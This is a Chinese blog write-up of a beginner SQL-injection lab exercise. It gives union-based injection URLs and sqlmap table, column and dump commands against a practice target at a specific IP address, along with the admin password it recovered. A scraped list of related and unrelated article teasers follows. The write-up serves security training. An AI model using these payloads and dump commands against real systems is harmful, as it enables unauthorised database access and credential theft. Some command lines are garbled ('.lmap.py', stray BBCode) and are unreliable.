第一次靶场练习:SQL注入(1)
SQL注入1
本文章目的是对相关的黑客内容进一步了解,如有人违反相关的法律法规,本人概不负责
一、学习目的:
- 利用手工注入网站
- 利用sqlmab注入
二、附件说明
- 靶场网址:http://117.41.229.122:8003/?id=1
- 工具sqlmap下载:https://download.csdn.net/download/qq_41803637/10911556
- sqlmap使用说明:https://www.cnblogs.com/ichunqiu/p/5805108.html
三、手工注入
1、判断有无注入点
代码1
http://117.41.229.122:8003/?id=1 and 1=1
实践1
回车后导航条,显示下面的情景,是正常现象,不用管
代码2
http://117.41.229.122:8003/?id=1 and 1=2
实践2
说明:两个效果不一样,说明有注入点
2、猜测注入点的数量
代码
关键词:order by 注入点数量
http://117.41.229.122:8003/?id=1 order by 50
实践
说明注入点判断错误
说明注入点判断成功
说明:注入点的个数为2
3、查询显现字段
代码
关键字:union select
http://117.41.229.122:8003/?id=1 and 1=2 union select 1,2
说明:
- 为方便显示显现的字段,所以特意设置 and 1-2
- 前面测出有几个注入点,就在select后面输入从1到n的几个数
实践
说明:显现字段为2
4、查询数据库版本
代码
http://117.41.229.122:8003/?id=1 and 1=2 union select 1,version()
注意:在显现字段处,写查询的事务
实践
说明:版本为MySQL 5.5.53
5、查询数据库
代码
http://117.41.229.122:8003/?id=1 and 1=2 union select 1,database()
实践
说明:数据库名为maoshe
6、查询数据表
代码
http://117.41.229.122:8003/?id=1 and 1=2 UNION SELECT 1,table_name from information_schema.tables where table_schema=database()
实践
说明:在数据库maoshe里面有一个数据表admin
7、查找密码
代码
http://117.41.229.122:8003/?id=1 and 1=2 UNION SELECT 1,password from admin
实践
说明:密码为hellohack
四、sqlmap注入
1、猜解是否能注入
win: python sqlmap.py -u
"网址?id=1"
【id等于几可以随便输入,但是必须输入且只能为数字】
Linux : .lmap.py -u
"网址?id=7"
【id等于几可以随便输入,但是必须输入且只能为数字】
后面为方便理解,全部以网址放置
2、猜解表
win: python sqlmap.py -u
"http://117.41.229.122:8003/?id=1"
--tables
Linux: .lmap.py -u
"http://117.41.229.122:8003/?id=1"
--tables
3、 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)
win: python sqlmap.py -u
"http://117.41.229.122:8003/?id=1"
--columns -T admin
Linux: .lmap.py -u
"http://117.41.229.122:8003/?id=1"
--columns -T admin
4、 根据字段猜解内容(假如通过3得到字段为username和password)
win: python sqlmap.py -u
"http://117.41.229.122:8003/?id=1"
--dump -T admin -C
"username,password"
Linux: .lmap.py -u
"http://117.41.229.122:8003/?id=1"
--dump -T admin -C
"username,[url=]B[/url]password"
第一次靶场练习:SQL注入(1)的更多相关文章
- 第一次MySQL的SQL注入实验
测试平台:https://www.mozhe.cn/news/detail/324 上完SQL注入的第一节课过来对着笔记一步一步来做.. 1.首页面上没有id=XXX的东西,看见“平台维护通知”,点开 ...
- 人生第一次成功的sql注入
看了一些学习视频,按着大神们的教程,搜索inurl:asp?id=,结果一个可以注入的站点都找不到,绝望. 不放弃,又找啊找,找啊找,终于找到了一个! 啦啦啦,注入点!ヾ(o◕∀◕)ノヾ!! 再来查数 ...
- 常见web漏洞的整理之SQL注入
SQL注入: 简介: 全称Structured Query Language,即结构化查询语言,是一种特殊的编程语言,用于数据库中的标准数据查询语言.也被作为关系式数据库管理系统的标准语言. 原理: ...
- 十二:SQL注入之简要注入
SQL注入漏洞将是重点漏洞,分为数据库类型,提交方法,数据类型等方式.此类漏洞是WEB漏洞中的核心漏洞,学习如何的利用,挖掘,和修复是重要的. SQL注入的危害 SQL注入的原理 可控变量,带入数据库 ...
- 2019-10-24:伪静态,VULHUB搭建靶场,宽字节sql注入,笔记
伪静态1,需要开启站点的重写机制,需要修改配httpd配置文件,将LoadModule rewrite_module modules/mod_rewrite.so注释取消,需要apache支持解析.h ...
- 渗透测试初学者的靶场实战 1--墨者学院SQL注入—布尔盲注
前言 大家好,我是一个渗透测试的爱好者和初学者,从事网络安全相关工作,由于爱好网上和朋友处找了好多关于渗透的视频.工具等资料,然后自己找了一个靶场,想把自己练习的体会和过程分享出来,希望能对其他渗透爱 ...
- 靶场sql注入练手----sqlmap篇(纯手打)
靶场地址:封神台 方法一.首先尝试手工找注入点判断 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车,页面返回正常 构造 ?id=1 and 1=2 ,回车,页面不正常,初 ...
- SQL注入靶场
靶场搭建 系统环境&工具 环境采用centos7的版本(纯命令行),采用一键部署平台,phpstudy工具,安装教程链接:https://www.xp.cn/linux.html#instal ...
- 与SQL注入第一次相遇
sql注入的含义sql注入是将代码插入(拼接)到应用(用户)的输入参数中, 之后再将这些参数传递给后台的SQL服务器加以解析并执行的攻击, 总结起来就是攻击者将恶意代码拼接到sql语句并加以执行从而得 ...
随机推荐
- VNPY加密教程(Python生成pyd文件)
安装成功之后,再修改设置.让Cython可以找到vcarsall.bat.此处有两种方案.(我采用方案1,亲测可用.方案2未测试,看似可用.) 方案1:修改Python安装目录的文件设置 window ...
- 提升 Hive Query 执行效率 - Hive LLAP
从 Hive 刚推出到现在,得益于社区对它的不断贡献,使得 Hive执行 query 效率显著提升.其中比较有代表性的功能如 Tez (将多个 job整合为一个DAG job)以及 CBO(Cost- ...
- Django web框架-----url path name详解
说明:mytestsite是django框架下的项目,quicktool是mytestsite项目中的应用 quicktool/view.py文件修改视图函数index(),渲染一个home.html ...
- xadmin邮箱验证码 标题 EmailVerifyRecord object
[修改users-models模块] 1.如果这样不生效 def __unicode__(self): return '{0}({1})'.format(self.code, self.email) ...
- spring RedisTemplate的使用(一)--xml配置或JavaConfig配置
1.xml配置 <?xml version="1.0" encoding="UTF-8"?> <beans xmlns:xsi="h ...
- 【Java】【12】精确的加减乘除运算
前言:用了BigDecimal对象 正文: 1,加法 /** * @param v1 被加数 * @param v2 加数 * @param scale 保留几位小数*/ public static ...
- OO的奇妙冒险1
OO的奇妙冒险 ~OOP入门与字符串处理~ 目录 总体分析 作业内容分析 作业内容总结 互测的收获 公测互测bug分析与总结 不太正经的个人自嗨 总体分析 公测 中测(基础与进阶): 其实在我看来,从 ...
- linux 下的read write 和fread fwrite
待进一步测试啊,先占坑 --------2017/7/17 忘记之前要写什么了,只记得当时测试完得出的结论是,无论是写设备还是写文件,都用read/write是既安全又省事情的举动.还熟悉. 尽多少力 ...
- node.js安装express模块应用服务框架
1.创建工程文件夹case-04 2.在终端窗口进入文件夹目录,并输入:npm init,并一路回车,最后看到在case-04文件夹里自动生成了package.json 文件 3.打开vscode,进 ...
- zookeeper应用与原理学习总结
一.什么是zookeeper Zookeeper 分布式服务框架是Apache Hadoop 的一个子项目,它主要是用来解决分布式应用中经常遇到的一些数据管理问题,如:统一命名服务.状态同步服务.集群 ...